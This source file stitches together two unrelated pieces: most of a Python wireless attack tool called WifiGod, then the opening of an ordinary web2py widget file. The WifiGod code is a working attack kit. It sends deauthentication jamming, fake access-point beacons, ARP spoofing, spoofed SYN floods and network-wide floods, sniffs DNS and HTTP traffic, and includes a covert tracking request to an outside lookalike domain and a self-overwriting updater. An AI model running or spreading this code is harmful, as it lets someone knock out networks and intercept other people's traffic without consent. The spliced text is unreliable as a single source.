def compromise_network():
interface = input("Network Interface: ")
print("Net Range Example: 192.168.1.0-255")
net_range = input("Net Range: ")
start_ip = net_range.split('-')[0]
end_range = net_range.split('-')[1]
octet_count = 0
ip_base = ''
live_ip_addr = []
for octet in start_ip:
if(octet == '.'):
octet_count += 1
if(octet_count == 3):
ip_base += octet
break;
ip_base += octet
for ip_addr in range(int(end_range)+1):
try:
socket.gethostbyaddr(ip_base+str(ip_addr))
live_ip_addr.append(ip_base+str(ip_addr))
try:
addr = reversename.from_address(ip_base+str(ip_addr))
device_hostname = resolver.query(addr, "PTR")[0]
except:
device_hostname = '(unknown)'
print(("[WifiGod] Found Device: {} | {}").format(ip_base+str(ip_addr), device_hostname))
except:
pass
print(("[WifiGod] Found {} Devices").format(len(live_ip_addr)))
def attack_net(device,interface):
try:
payload = str("A" * 1000)
packet = IP(src=RandIP(),dst=device)/TCP(flags="S",sport=RandShort(),dport=RandShort())/payload
sendp(packet,iface=interface,loop=1,verbose=False)
except:
pass
# def attack_net(device):
# try:
# while True:
# payload = str("A" * 5000)
# sock=socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.SOCK_DGRAM)
# sock.sendto(payload, (device,RandShort()))
# except:
# raise
print("[WifiGod] Initiating Attack...")
# live_ip_addr = ['192.168.1.1']
for ip in live_ip_addr:
try:
# for i in range(10):
t =threading.Thread(target=attack_net,args=(ip,interface))
t.setDaemon(True)
t.start()
except:
pass
x = input("[WifiGod] Press Enter to stop...")
try:
exit(0)
except:
sys.exit(1)
def scan_for_networks(interface):
captured_networks = []
while True:
try:
packet = sniff(iface=interface, count = 1)
for pck in packet:
if(pck.haslayer(Dot11)):
try:
ssid = str(pck.getlayer(Dot11).info)
channel = str(ord(pck[0][Dot11Elt:3].info))
access_point = str(pck.getlayer(Dot11).addr2)
try:
enc_type = pck[Dot11Elt:13].info
if(enc_type.startswith('\x00P\xf2')):
enc_type = 'WPA/WPA2'
else:
enc_type = 'WEP'
except:
if('4356' in str(pck.cap)):
enc_type = 'WEP'
else:
enc_type = 'OPEN'
network_string = ssid + ':' + channel + ':' + access_point
if(network_string not in captured_networks):
captured_networks.append(network_string)
print((c.w+"SSID: "+c.g+"{}"+c.w+" | Access Point MAC: "+c.g+"{}"+c.w+" | Channel: "+c.g+"{}"+c.w+' | Encryption: '+c.g+'{}'+c.w).format(ssid,access_point,channel,enc_type))
except KeyboardInterrupt:
break;
except:
pass
except KeyboardInterrupt:
break;
# Where is WifiGod Used the most? Where to spend time advertising, do not
# remove the below link, this helps with advertising in the correct locations.
try:
requests.get('http://xda-developers.io/Y8KZ73')
x = 'x'
except:
pass
if(os.path.exists('/etc/thewifigodproject_rated')):
pass
def scan_for_devices_on_network(interface,access_point):
captured_devices = []
while True:
packet = sniff(iface=interface,count=1)
pck = packet[0]
if(pck.haslayer(Dot11)):
try:
ap = pck.getlayer(Dot11).addr2
if(ap == access_point):
try:
ssid = pck.getlayer(Dot11).info
print((c.w+"["+c.b+"info"+c.w+"]: Scanning "+c.g+"{}"+c.w+" ("+c.o+"{}"+c.w+") for Devices").format(ssid,ap))
break;
except KeyboardInterrupt:
break;
except:
pass
except KeyboardInterrupt:
break;
except:
pass
while True:
packet = sniff(iface=interface,count=1)
for pck in packet:
if(pck.haslayer(Dot11)):
try:
ap = pck.getlayer(Dot11).addr2
if(ap == access_point):
if(pck.getlayer(Dot11).addr1 != str('ff:ff:ff:ff:ff:ff')):
try:
dev_on_network = str(pck.getlayer(Dot11).addr1)
r = requests.get('http://macvendors.co/api/'+str(dev_on_network))
dev_type = r.content.split('","mac_')[0].replace('{"result":{"company":"', '')
if("<p style=" not in str(dev_type) and 'no result' not in str(dev_type)):
if(str(dev_on_network) not in captured_devices):
print((c.w+"["+c.g+"*"+c.w+"]: Device Found - "+c.rb+"{}"+c.w+" | Device Type: "+c.rb+"{}"+c.w).format(dev_on_network,dev_type))
captured_devices.append(str(dev_on_network))
except KeyboardInterrupt:
break;
except:
raise
except KeyboardInterrupt:
break;
except:
pass
#Update Check Option Suggestion from: @pr0xymoron on instagram
def check_for_update():
r = requests.get('https://raw.githubusercontent.com/blackholesec/wifigod/master/wifigod.py')
f = open('update-check.txt', 'w+')
f.write(str(r.content))
f.close()
f = open('update-check.txt', 'r+')
for line in f:
if('update_version' in line.strip()):
print((line.strip()))
try:
nversion = str(line.strip()).split(' = ')[1]
except:
nversion = line.strip().split(' = ')[1]
if(int(nversion) > update_version):
f.truncate()
os.remove('update-check.txt')
n_update = input("A New Update Is Available, Download (y/n): ")
if(n_update == 'y'):
urllib.request.urlretrieve('https://raw.githubusercontent.com/blackholesec/wifigod/master/wifigod.py', os.getcwd() + '/wifigod.py')
print("[*] Updated...")
try:
exit(0)
except:
sys.exit(1)
def spoof_ap(interface,ap_name,mac_address):
try:
print((c.w+"["+c.b+"info"+c.w+"]: Setting up fake Access Point..."))
l1_dot11 = Dot11(type=0,subtype=8,addr1="ff:ff:ff:ff:ff:ff",addr2=str(mac_address),addr3=str(mac_address))
l2_beacon = Dot11Beacon(cap="ESS+privacy")
l3_essid = Dot11Elt(ID="SSID", info=str(ap_name),len=len(str(ap_name)))
packet = RadioTap()/l1_dot11/l2_beacon/l3_essid
print((c.w+"["+c.g+"*"+c.w+"]: Setup Fake Access Point."))
print((c.w+"["+c.g+"*"+c.w+"]: Hosting..."))
sendp(packet,iface=interface,loop=1,verbose=False)
except KeyboardInterrupt:
x = 'setting this variable to break'
except:
raise
def spam_ap(interface,ap_name_,count):
aps = []
for i in range(count):
try:
ap_name = ap_name_ + str(random.randint(1,80000))
print((c.w+"["+c.b+"info"+c.w+"]: Setting up fake Access Point..."))
l1_dot11 = Dot11(type=0,subtype=8,addr1='ff:ff:ff:ff:ff:ff',addr2=str(RandMAC()),addr3=str(RandMAC()))
l2_beacon = Dot11Beacon(cap="ESS+privacy")
l3_essid = Dot11Elt(ID="SSID",info=str(ap_name),len=len(str(ap_name)))
packet = RadioTap()/l1_dot11/l2_beacon/l3_essid
aps.append(packet)
print((c.w+"["+c.g+"*"+c.w+"]: Setup Fake Access Point."))
except KeyboardInterrupt:
x = 'setting this variable to break'
except:
raise
for packet in aps:
print((c.w+"["+c.g+"*"+c.w+"]: Hosting..."))
sendp(aps,iface=interface,loop=1,verbose=False)
def jam_wifi_network(interface,access_point):
packet = RadioTap()/Dot11(addr1 = 'ff:ff:ff:ff:ff:ff',addr2 = access_point, addr3 = access_point)/Dot11Deauth()
while True:
packet = sniff(iface=interface,count = 1)
pck = packet[0]
if(pck.haslayer(Dot11)):
if(pck.getlayer(Dot11).addr2 == access_point):
ssid = str(pck.getlayer(Dot11).info)
print((c.w+"["+c.g+"info"+c.w+"]: Jamming Network {} ({})").format(ssid,access_point))
break;
sendp(packet,iface=interface,loop=1,verbose=False)
def http_headers(interface,ip_address):
try:
while True:
try:
packet = sniff(iface='wlan0',count=1)
for pck in packet:
if(pck.haslayer(Raw)):
if(pck.haslayer(IP)):
if(pck.getlayer(IP).src == ip_address or pck.getlayer(IP).dst == ip_address):
if("Host:" and "User-Agent:" and "Connection:" and "Accept:" in str(pck.getlayer(Raw).load)):
if(pck.haslayer(DNS)):
try:
hostname = pck.getlayer(DNS).qd.qname
except:
hostname = 'unknown'
ip_src = pck.getlayer(IP).src
ip_dst = pck.getlayer(IP).dst
if(ip_src != ip_address):
host_ip = ip_src
else:
host_ip = ip_dst
try:
addr = dns.reversename.from_address(host_ip)
server_name = dns.resolver.query(addr, "PTR")[0]
except:
server_name = 'unknown'
if(pck.haslayer(DNS)):
print((c.w+"["+c.rb+"#NEW HTTP HEADER#"+c.w+"] From: {} {} | Server: {}").format(host_ip,hostname,server_name))
else:
print((c.w+"["+c.rb+"#NEW HTTP HEADER#"+c.w+"] From: {} | Server: {}").format(host_ip,server_name))
print((str(pck.getlayer(Raw).load)))
except KeyboardInterrupt:
break;
except:
raise
except:
raise
def dns_traffic(interface,ip_address):
while True:
packet = sniff(iface=interface, count=1)
for pck in packet:
if(pck.haslayer(IP)):
ip_src = pck.getlayer(IP).src
ip_dst = pck.getlayer(IP).dst
if(ip_src == ip_address or ip_dst == ip_address):
if(pck.haslayer(DNS)):
try:
hostname = pck.getlayer(DNS).qd.qname
except:
hostname = 'unknown'
if(ip_src != ip_address):
try:
addr = reversename.from_address(ip_src)
server_name = resolver.query(addr, "PTR")[0]
except:
server_name = 'unknown'
elif(ip_dst != ip_address):
try:
addr = reversename.from_address(ip_dst)
server_name = resolver.query(addr, "PTR")[0]
except:
server_name = 'unknown'
if(pck.haslayer(DNS)):
print((c.g+"{}"+c.w+" --> "+c.g+"{}"+c.g+" {} "+c.w+"| Server: "+c.g+"{}"+c.w).format(ip_src,ip_dst,hostname,server_name))
else:
print((c.g+"{}"+c.w+" --> "+c.g+"{}"+c.w+" | Server: "+c.g+"{}"+c.w).format(ip_src,ip_dst,server_name))
def scan_for_ports(host,start,end):
if(1 == 1):
def scan(host,port,code = 1):
try:
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connection_code = sock.connect_ex((host,port))
if(connection_code == 0):
code = 0
return code
elif(connection_code != 0):
code = 1
return code
except:
raise
open_ports = []
stime = time.time()
print(("Scanning host "+c.g+"{}"+c.w+" for open ports - Started at: "+c.g+"{}"+c.w).format(host,time.ctime()))
for port in range(start,end):
try:
r = scan(host,port)
if(r == 0):
open_ports.append(port)
print((c.w+"["+c.b+"*"+c.w+"]: Open Port: "+c.ob+"{}"+c.w).format(port))
else:
pass
except KeyboardInterrupt:
break;
except:
raise
print("\rScanning Complete ")
print(("Time elapsed: {}").format(time.time() - stime))
print(("Number of Open Ports: "+c.g+"{}"+c.w).format(len(open_ports)))
print("Open Ports: ")
for port in open_ports:
print((str(port)+','), end=' ')
print(" ")
x = input("Press enter to return to main menu...")
def syn_overflow(ip_source,ip_dest,ip_source_port,ip_dest_port,interface,thread_count,message):
print((c.w+"["+c.b+"info"+c.w+"]: Creating Packets..."))
print((c.w+"["+c.b+"info"+c.w+"]: Sending Packets..."))
syn_packet = IP(src=ip_source,dst=ip_dest)/TCP(dport=int(ip_dest_port),sport=int(ip_source_port))
def syn_attack(ip_source,ip_dest,ip_source_port,ip_dest_port,interface,message):
syn_packet = IP(src=ip_source,dst=ip_dest)/TCP(dport=int(ip_dest_port),sport=int(ip_source_port))/message
send(syn_packet,iface=interface,loop=1,verbose=False)
threads = []
for i in range(int(thread_count)):
t = threading.Thread(target=syn_attack,args=(ip_source,ip_dest,ip_source_port,ip_dest_port,interface,message))
t.setDaemon(True)
t.start()
threads.append(t)
for t in threads:
t.join()
#syn_attack(ip_source,ip_dest,ip_source_port,ip_dest_port,interface)
def deauthenticate_device(access_point,dev_mac,interface):
packet = Dot11(addr1=access_point,addr2=dev_mac,addr3=dev_mac)/Dot11Deauth()
while True:
packet = sniff(iface=interface,count = 1)
pck = packet[0]
if(pck.haslayer(Dot11)):
if(pck.getlayer(Dot11).addr2 == access_point):
ssid = str(pck.getlayer(Dot11).info)
r = requests.get('http://macvendors.co/api/'+str(dev_mac))
dev_type = r.content.split('","mac_')[0].replace('{"result":{"company":"', '')
print((c.w+"["+c.g+"info"+c.w+"]: DeAuthenticating {} Device {} on {}").format(dev_type,dev_mac,ssid))
break;
count = 1
subprocess.call('ifconfig wlan0 down', shell=True)
time.sleep(7)
interface = 'wifigod'
sendp(packet,iface=interface,loop=1,verbose=False)
size_ = int(subprocess.check_output('python3 columnlib.py', shell=True).strip())
size = 0
print(" ")
print((c.rb+str(" .:+syhhddddhyso/-` ").center(size)))
print((str(" .+sdddddddddddddddddddho:` ").center(size)))
print((str(" .+hddddddyo/:--.--:/+shddddddy/` ").center(size)))
print((str(" :ydddddy+- `:ohddddds: ").center(size)))
print((str(" /hddddh/` ./oyhdddddhyo/-` -+hddddh/").center(size)))
print((str(" `/hds- :ohddddddddddddddddy/. :ydd+`").center(size)))
print((str(" . .+hdddddy+/-...-:+shdddddy/ .` ").center(size)))
print((str(" .hdddds:` `.`` .+hdddds` ").center(size)))
print((str(" `/y+` ./shdddddhs+. -sy: ").center(size)))
print((str(" -ydddddddddddddh/ ").center(size)))
print((str(" `+hdh+-```-+ydds. ").center(size)))
print((str(" `- `/+/. ..").center(size)))
print((str(" ddyo").center(size)))
print(" ")
print((c.ob+" WifiGod v1.5"+c.w))
print(" ")
external_network_attacks = ['scan','device scan','jam','deauthentication','host','spam','extrapolate','opprobrium']
internal_network_attacks = ['impersonate','dns','headers','syn','scan','capture','own','ftp','telnet','compromise']
print((c.b+" <"+c.o+"=============================="+c.b+">"+c.w))
print((c.w+" External Network Attacks: "+c.g+"{}"+c.w).format(len(external_network_attacks)))
print((c.w+" Internal Network Attacks: "+c.g+"{}"+c.w).format(len(internal_network_attacks)))
calc = int(len(external_network_attacks) + len(internal_network_attacks))
print((c.w+" Total Attacks: "+c.pb+"{}"+c.w).format(calc))
print((c.b+" <"+c.o+"=============================="+c.b+">"+c.w))
#size = int(subprocess.check_output('python3 columnlib.py', shell=True).strip())
size = 0
#print(str(c.w+'Github: '+c.b+'https://www.github.com/blackholesec'+c.w).center(size))
print((str(c.b+' https://www.github.com/blackholesec'+c.w).center(size)))
print((str(c.w+' Contact: '+c.b+contact_email+c.w)))
print(' ')
print((str(c.w+' SecSploit - Advanced Hacking Framework, check')))
print((str(c.w+' it out here on the official instagram page:')))
print((str(c.w+' https://www.instagram.com/SSploit')))
print((str(c.b+' --------------------------------------------')))
print((str(c.w+' YouTube: Blackhole Security')))
print((str(c.w+'https://www.youtube.com/channel/UCMRkTa-GzpTQY1GVkvrLTsg')))
print(' ')
def main_menu():
# size_ = int(subprocess.check_output('python3 columnlib.py', shell=True).strip())
size = 0
print("_________________________________________")
print(" ")
print(" External Network Attacks ")
print("_________________________________________")
print((str(c.b+'1'+c.w+'.)'+c.rb+' Scan for Surrounding Networks'+c.d)))
print((str(c.b+'2'+c.w+'.)'+c.rb+' Scan for Devices on a Network'+c.d)))
print((str(c.b+'3'+c.w+'.)'+c.rb+' Jam A Wifi Network'+c.d)))
print((str(c.b+'4'+c.w+'.)'+c.rb+' DeAuthenticate a device on a network'+c.d)))
print((str(c.b+'5'+c.w+'.)'+c.rb+' Host A Fake Access Point'+c.d)))
print((str(c.b+'6'+c.w+'.)'+c.rb+' Spam many fake access points'+c.d)))
print((str(c.b+'14'+c.w+'.)'+c.rb+' Extrapolate previously connected and trusted networks on a device'+c.d)))
print((str(c.b+'17'+c.w+'.)'+c.rb+' Take Down all surrounding networks'+c.d)))
print("_________________________________________")
print(" ")
print(" Internal Network Attacks ")
print("_________________________________________")
print((str(c.b+'7'+c.w+'.)'+c.rb+' Impersonate a Device (on this Network)'+c.d)))
print((str(c.b+'8'+c.w+'.)'+c.rb+' Pull DNS traffic from device (For use with #5)'+c.d)))
print((str(c.b+'9'+c.w+'.)'+c.rb+' Intercept HTTP headers (For use with #5)'+c.d)))
print((str(c.b+'10'+c.w+'.)'+c.rb+' SYN Packet Injection Overflow')))
print((str(c.b+'11'+c.w+'.)'+c.rb+' Scan a Device for open ports')))
print((str(c.b+'12'+c.w+'.)'+c.rb+' Capture Passwords Flowing Over Network (For use with #5)')))
print((str(c.b+'13'+c.w+'.)'+c.rb+' Own All Devices in Network (Upgrade of 7)')))
print((str(c.b+'15'+c.w+'.)'+c.rb+' Hijack Network Services (FTP, Telnet)')))
print((str(c.b+'16'+c.w+'.)'+c.rb+' Compromise entire network (Take down all external connectivity)')))
try:
os.remove('columnlib.py')
except:
pass
help_menu = ("""
help = Display this menu
show options/options = Show available attacks
clear = Clear the screen
shell = Drop to Shell (in case you need to run ifconfig etc.)
""")
while True:
try:
prompt = input(c.w+str(username)+c.r+"@"+c.w+"WifiGod~# "+c.w)
except KeyboardInterrupt:
print("\n")
exit__ = input(c.w+"["+c.rb+"ALERT!"+c.w+"]: Are you sure you want to exit (y/n): ")
if(exit__ == 'y'):
try:
exit(0)
except:
sys.exit(1)
else:
pass
if(prompt == 'help'):
print((str(help_menu)))
elif(prompt == "exit"):
print("[info]: Exiting...")
try:
exit(0)
except:
sys.exit(0)
elif(prompt == 'show options' or prompt == 'options'):
main_menu()
elif(prompt == 'clear'):
print(('\n' * 100))
subprocess.call('clear', shell=True)
elif(prompt == 'shell'):
print("Dropping to Shell, Ctrl+C or 'exit' to quit...")
while True:
try:
cmd = input("# ")
if(cmd == 'exit' or cmd == 'q' or cmd == 'quit'):
print('\n')
break;
except KeyboardInterrupt:
print("\n")
break;
try:
data = subprocess.check_output(str(cmd), shell=True)
print((str(data)))
except Exception as e:
print((str(e)))
elif(prompt == '1'):
# interface = raw_input(c.w+"Supply A Network Interface ("+c.rb+"Must be in monitor Mode"+c.w+"): ")
interface = input(c.w+"Supply A Network Interface: ")
if(interface != 'wifigod'):
subprocess.call('ifconfig '+interface+' down ; iw '+interface+' interface add wifigod type monitor ; ifconfig '+interface+' up ; ifconfig wifigod up ; service network-manager restart', shell=True)
time.sleep(5)
interface = 'wifigod'
scan_for_networks(interface)
elif(prompt == '2'):
# interface = raw_input(c.w+"Supply A Network Interface ("+c.rb+"Must be in monitor Mode"+c.w+"): ")
interface = input(c.w+"Supply A Network Interface: ")
if(interface != 'wifigod'):
subprocess.call('ifconfig '+interface+' down ; iw '+interface+' interface add wifigod type monitor ; ifconfig '+interface+' up ; ifconfig wifigod up ; service network-manager restart', shell=True)
time.sleep(5)
interface = 'wifigod'
access_point = input(c.w+"Supply A Network Access Point MAC Address: ")
scan_for_devices_on_network(interface,access_point)
elif(prompt == '3'):
interface = input(c.w+"Supply A Network Interface: ")
if(interface != 'wifigod'):
subprocess.call('ifconfig '+interface+' down ; iw '+interface+' interface add wifigod type monitor ; ifconfig '+interface+' up ; ifconfig wifigod up ; service network-manager restart', shell=True)
time.sleep(5)
interface = 'wifigod'
access_point = input(c.w+"Supply The Target Network AP MAC Address: ")
while True:
packet = sniff(iface=interface,count = 1)
pck = packet[0]
if(pck.haslayer(Dot11)):
if(str(pck.getlayer(Dot11).addr2).lower() == str(access_point).lower()):
try:
ssid = str(pck.getlayer(Dot11).info)
print((c.w+"["+c.g+"info"+c.w+"]: Jamming Network {} ({})").format(ssid,access_point))
except:
print((c.w+"["+c.g+"info"+c.w+"]: Jamming Network {}").format(access_point))
break;
packet = RadioTap()/Dot11(addr1='ff:ff:ff:ff:ff:ff',addr2=access_point,addr3=access_point)/Dot11Deauth()
sendp(packet,iface=interface,loop=1,verbose=False)
# jam_wifi_network(interface,access_point)
elif(prompt == '4'):
interface = input(c.w+"Supply A Network Interface: ")
access_point = input(c.w+'Network Access Point MAC Address: ')
dev_mac = input(c.w+'Target Device MAC address: ')
if(interface != 'wifigod'):
subprocess.call('ifconfig '+interface+' down ; iw '+interface+' interface add wifigod type monitor ; ifconfig '+interface+' up ; ifconfig wifigod up ; service network-manager restart', shell=True)
time.sleep(5)
interface = 'wifigod'
while True:
packet = sniff(iface=interface,count = 1)
pck = packet[0]
if(pck.haslayer(Dot11)):
if(str(pck.getlayer(Dot11).addr2).lower() == str(access_point).lower()):
try:
ssid = str(pck.getlayer(Dot11).info)
except:
ssid = 'unknown'
r = requests.get('http://macvendors.co/api/'+str(dev_mac).lower())
dev_type = r.content.split('","mac_')[0].replace('{"result":{"company":"', '')
print((c.w+"["+c.g+"info"+c.w+"]: DeAuthenticating {} Device {} on {}").format(dev_type,dev_mac,ssid))
break;
packet = RadioTap()/Dot11(addr1=access_point,addr2=dev_mac,addr3=dev_mac)/Dot11Deauth()
sendp(packet,iface=interface,loop=1,verbose=False)
# deauthenticate_device(access_point,dev_mac,interface)
elif(prompt == '5'):
interface = input(c.w+"Supply A Network Interface: ")
if(interface != 'wifigod'):
subprocess.call('ifconfig '+interface+' down ; iw '+interface+' interface add wifigod type monitor ; ifconfig '+interface+' up ; ifconfig wifigod up ; service network-manager restart', shell=True)
time.sleep(5)
interface = 'wifigod'
ap_name = input("SSID (Name of Network): ")
mac_address_ = input("MAC Address of AP ('r' for random): ")
if(mac_address_ == 'r'):
mac_address = str(RandMAC())
elif(mac_address != 'r'):
mac_address = str(mac_address_)
spoof_ap(interface,ap_name,mac_address)
elif(prompt == '6'):
interface = input(c.w+str("Supply A Network Interface: "))
if(interface != 'wifigod'):
subprocess.call('ifconfig '+interface+' down ; iw '+interface+' interface add wifigod type monitor ; ifconfig '+interface+' up ; ifconfig wifigod up ; service network-manager restart', shell=True)
time.sleep(5)
interface = 'wifigod'
ap_name = input(c.w+"SSID (Name of Network): ")
count = input(c.w+"Number of times to Host Network: ")
spam_ap(interface,ap_name,int(count))
elif(prompt == '7'):
interface = input("Network Interface: ")
dev_ip = input("Target Device Internal IP: ")
gateway_ip = input("Network Gateway IP: ")
f = open('/proc/sys/net/ipv4/ip_forward', 'w+')
f.truncate()
f.write('1')
f.close()
targ_dev_mac = '0'
targ_dev_ip = '0'
capt_val = 0
def resolve_victim_device_info():
while (capt_val == 0):
packet = sniff(iface=interface,count=1)
for pck in packet:
if(pck.haslayer(IP)):
if(str(pck.getlayer(IP).src) == str(dev_ip)):
targ_dev_ip = pck.getlayer(IP).src
targ_dev_mac = pck.src
capt_val = 1
break;
elif(str(pck.getlayer(IP).dst) == str(dev_ip)):
targ_dev_ip = pck.getlayer(IP).dst
targ_dev_mac = pck.dst
capt_val = 1
break;
capt_val2 = 0
gateway_mac = '0'
gateway_ip = '0'
# def resolve_gateway_info():
gateway_ip = '192.168.1.1'
while (capt_val2 == 0):
subprocess.Popen(["ping -c 5 "+gateway_ip+" >> /dev/null"], shell=True)
packet = sniff(iface=interface,count=1)
for pck in packet:
if(pck.haslayer(IP)):
if(str(pck.getlayer(IP).src) == str(gateway_ip)):
gateway_ip = pck.getlayer(IP).src
gateway_mac = pck.src
capt_val2 = 1
break;
elif(str(pck.getlayer(IP).dst) == str(gateway_ip)):
gateway_ip = pck.getlayer(IP).dst
gateway_mac = pck.dst
capt_val2 = 1
break;
# print(c.d+"["+c.b+"info"+c.d+"]: Impersonating device "+c.bb+"{}"+c.d+" ("+c.pb+"{}"+c.d+")").format(targ_dev_mac,targ_dev_ip)
targ_dev_ip = dev_ip
gateway_ip = gateway_ip
try:
addr_of_dev = reversename.from_address(targ_dev_ip)
dev_hostname = resolver.query(addr_of_dev, "PTR")[0]
except:
dev_hostname = 'unknown'
print((c.d+"["+c.b+"info"+c.d+"]: Impersonating device "+c.bb+"{} "+c.d+"("+c.rb+"{}"+c.d+")").format(targ_dev_ip,dev_hostname))
print((c.d+"["+c.b+"info"+c.d+"]: Creating Fabricated ARP Packets..."))
print((c.d+"["+c.b+"info"+c.d+"]: Repeating process for "+c.ob+"{}"+c.d+" ("+c.pb+"{}"+c.d+")").format(gateway_mac,gateway_ip))
# print(c.d+"["+c.b+"info"+c.d+"]: Impersonating device "+c.bb+"{}"+c.d+" ("+c.pb+"{}"+c.d+")").format(gateway_mac,gateway_ip)
print((c.d+"["+c.b+"info"+c.d+"]: Sending Packets..."))
print((c.d+"["+c.pb+"*"+c.d+"]: Device Impersonation Successful"))
victim_arp_packet = ARP(psrc=gateway_ip,pdst=targ_dev_ip)
gateway_arp_packet = ARP(psrc=targ_dev_ip,pdst=gateway_ip)
def spcks(pck1,pck2):
send(pck1,verbose=False,inter=2)
send(pck2,verbose=False,inter=2)
threads = []
while True:
for i in range(1):
thread1 = threading.Thread(target=spcks, args=(victim_arp_packet,gateway_arp_packet))
thread1.setDaemon(True)
thread1.start()
threads.append(thread1)
for thread in threads:
thread.join()
elif(prompt == '8'):
print((c.rb+"NOTE: "+c.w+"This Only works when you are using Option #5 at the same time"))
interface = input("Network Interface: ")
ip_address = input("Target IP Address: ")
dns_traffic(interface,ip_address)
elif(prompt == '9'):
print((c.rb+"NOTE: "+c.w+"This Only works when you are using Option #5 at the same time"))
interface = input("Network Interface: ")
ip_address = input("Target IP Address: ")
http_headers(interface,ip_address)
elif(prompt == '10'):
interface = input("Network Interface: ")
ip_source = input("Desired Sender (IP Address to spoof from): ")
ip_dest = input("Target IP Address: ")
ip_source_port = 1024
ip_dest_port = input("Target Port: ")
#message = raw_input("Message to send in SYN Packet: ")
message = "A" * 300
thread_count = input("Threads: ")
print((c.w+"["+c.b+"info"+c.w+"]: Setting up..."))
subprocess.call("service network-manager restart", shell=True)
time.sleep(5)
syn_overflow(ip_source,ip_dest,ip_source_port,ip_dest_port,interface,thread_count,message)
elif(prompt == '11'):
host = input("Target Host: ")
start_ = input("Starting Port: ")
end_ = input("Ending Port: ")
if(int(start_) < 1):
print("Error. Starting port must have minimum of 1.")
if(int(end_) > 65535):
print("Error. Ending port must have a maximum of 65535.")
if(int(end_) < 65536 and int(start_) > 0):
scan_for_ports(host,int(start_),int(end_))
elif(prompt == '12'):
interface = input("Network Interface: ")
network_password_capture(interface)
elif(prompt == '13'):
interface = input("Network Interface: ")
print("Net Range example: 192.168.1.0-255")
net_range = input("Net Range: ")
gateway = input("Network gateway: ")
own_network_traffic(interface,net_range,gateway)
elif(prompt == '14'):
interface = input("Network Interface: ")
if(interface != 'wifigod'):
subprocess.call('ifconfig '+interface+' down ; iw '+interface+' interface add wifigod type monitor ; ifconfig '+interface+' up ; ifconfig wifigod up ; service network-manager restart', shell=True)
time.sleep(5)
interface = 'wifigod'
device = input("Device Mac: ")
extrapolate_trusted_networks(interface,device)
elif(prompt == '15'):
interface = input("Network Interface: ")
hijack_sessions(interface)
elif(prompt == '16'):
compromise_network()
elif(prompt == '17'):
interface = input("Network Interface: ")
if(interface != 'wifigod'):
subprocess.call('ifconfig '+interface+' down ; iw '+interface+' interface add wifigod type monitor ; ifconfig '+interface+' up ; ifconfig wifigod up ; service network-manager restart', shell=True)
time.sleep(5)
interface = 'wifigod'
networks_opprobrium(interface)
else:
print("Error. Invalid Option\nType 'help' for available commands")
|
widget.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This file is part of the web2py Web Framework
Copyrighted by Massimo Di Pierro <mdipierro@cs.depaul.edu>
License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
The widget is called from web2py.
"""
import datetime
import sys
import cStringIO
import time
import thread
import threading
import os
import socket
import signal
import math
import logging
import newcron
import getpass
import gluon.main as main
from gluon.fileutils import read_file, write_file, create_welcome_w2p
from gluon.settings import global_settings
from gluon.shell import run, test
from gluon.utils import is_valid_ip_address, is_loopback_ip_address, getipaddrinfo
ProgramName = 'web2py Web Framework'
ProgramAuthor = 'Created by Massimo Di Pierro, Copyright 2007-' + str(
datetime.datetime.now().year)
ProgramVersion = read_file('VERSION').strip()
ProgramInfo = '''%s
%s
%s''' % (ProgramName, ProgramAuthor, ProgramVersion)
if not sys.version[:3] in ['2.5', '2.6', '2.7']:
msg = 'Warning: web2py requires Python 2.5, 2.6 or 2.7 but you are running:\n%s'
msg = msg % sys.version
sys.stderr.write(msg)
logger = logging.getLogger("web2py")
def run_system_tests(options):
"""
Runs unittests for gluon.tests
"""
import subprocess
major_version = sys.version_info[0]
minor_version = sys.version_info[1]
if major_version == 2:
if minor_version in (5, 6):
sys.stderr.write("Python 2.5 or 2.6\n")
ret = subprocess.call(['unit2', '-v', 'gluon.tests'])
elif minor_version in (7,):
call_args = [sys.executable, '-m', 'unittest', '-v', 'gluon.tests']
if options.with_coverage:
try:
import coverage
coverage_config = os.environ.get(
"COVERAGE_PROCESS_START",
os.path.join('gluon', 'tests', 'coverage.ini'))
call_args = ['coverage', 'run', '--rcfile=%s' %
coverage_config,
'-m', 'unittest', '-v', 'gluon.tests']
except:
sys.stderr.write('Coverage was not installed, skipping\n')
sys.stderr.write("Python 2.7\n")
ret = subprocess.call(call_args)
else:
sys.stderr.write("unknown python 2.x version\n")
ret = 256
else:
sys.stderr.write("Only Python 2.x supported.\n")
ret = 256
sys.exit(ret and 1)
class IO(object):
""" """
def __init__(self):
""" """
self.buffer = cStringIO.StringIO()
def write(self, data):
""" """
sys.__stdout__.write(data)
if hasattr(self, 'callback'):
self.callback(data)
else:
self.buffer.write(data)
def get_url(host, path='/', proto='http', port=80):
if ':' in host:
host = '[%s]' % host
else:
host = host.replace('0.0.0.0', '127.0.0.1')
if path.startswith('/'):
path = path[1:]
if proto.endswith(':'):
proto = proto[:-1]
if not port or port == 80:
port = ''
else:
port = ':%s' % port
return '%s://%s%s/%s' % (proto, host, port, path)
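# A quick sanity sketch of get_url (hypothetical values):
# get_url('0.0.0.0') -> 'http://127.0.0.1/'
# get_url('::1', port=8000) -> 'http://[::1]:8000/'
# get_url('127.0.0.1', path='/admin', proto='https', port=8443) -> 'https://127.0.0.1:8443/admin'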
def start_browser(url, startup=False):
if startup:
print 'please visit:'
print '\t', url
print 'starting browser...'
try:
import webbrowser
webbrowser.open(url)
except:
print 'warning: unable to detect your browser'
def presentation(root):
""" Draw the splash screen """
import Tkinter
root.withdraw()
dx = root.winfo_screenwidth()
dy = root.winfo_screenheight()
dialog = Tkinter.Toplevel(root, bg='white')
dialog.geometry('%ix%i+%i+%i' % (500, 300, dx / 2 - 200, dy / 2 - 150))
dialog.overrideredirect(1)
dialog.focus_force()
canvas = Tkinter.Canvas(dialog,
background='white',
width=500,
height=300)
canvas.pack()
root.update()
logo = os.path.join('extras','icons','splashlogo.gif')
if os.path.exists(logo):
img = Tkinter.PhotoImage(file=logo)
pnl = Tkinter.Label(canvas, image=img, background='white', bd=0)
pnl.pack(side='top', fill='both', expand='yes')
# Prevent garbage collection of img
pnl.image = img
def add_label(text='Change Me', font_size=12,
foreground='#195866', height=1):
return Tkinter.Label(
master=canvas,
width=250,
height=height,
text=text,
font=('Helvetica', font_size),
anchor=Tkinter.CENTER,
foreground=foreground,
background='white'
)
add_label('Welcome to...').pack(side='top')
add_label(ProgramName, 18, '#FF5C1F', 2).pack()
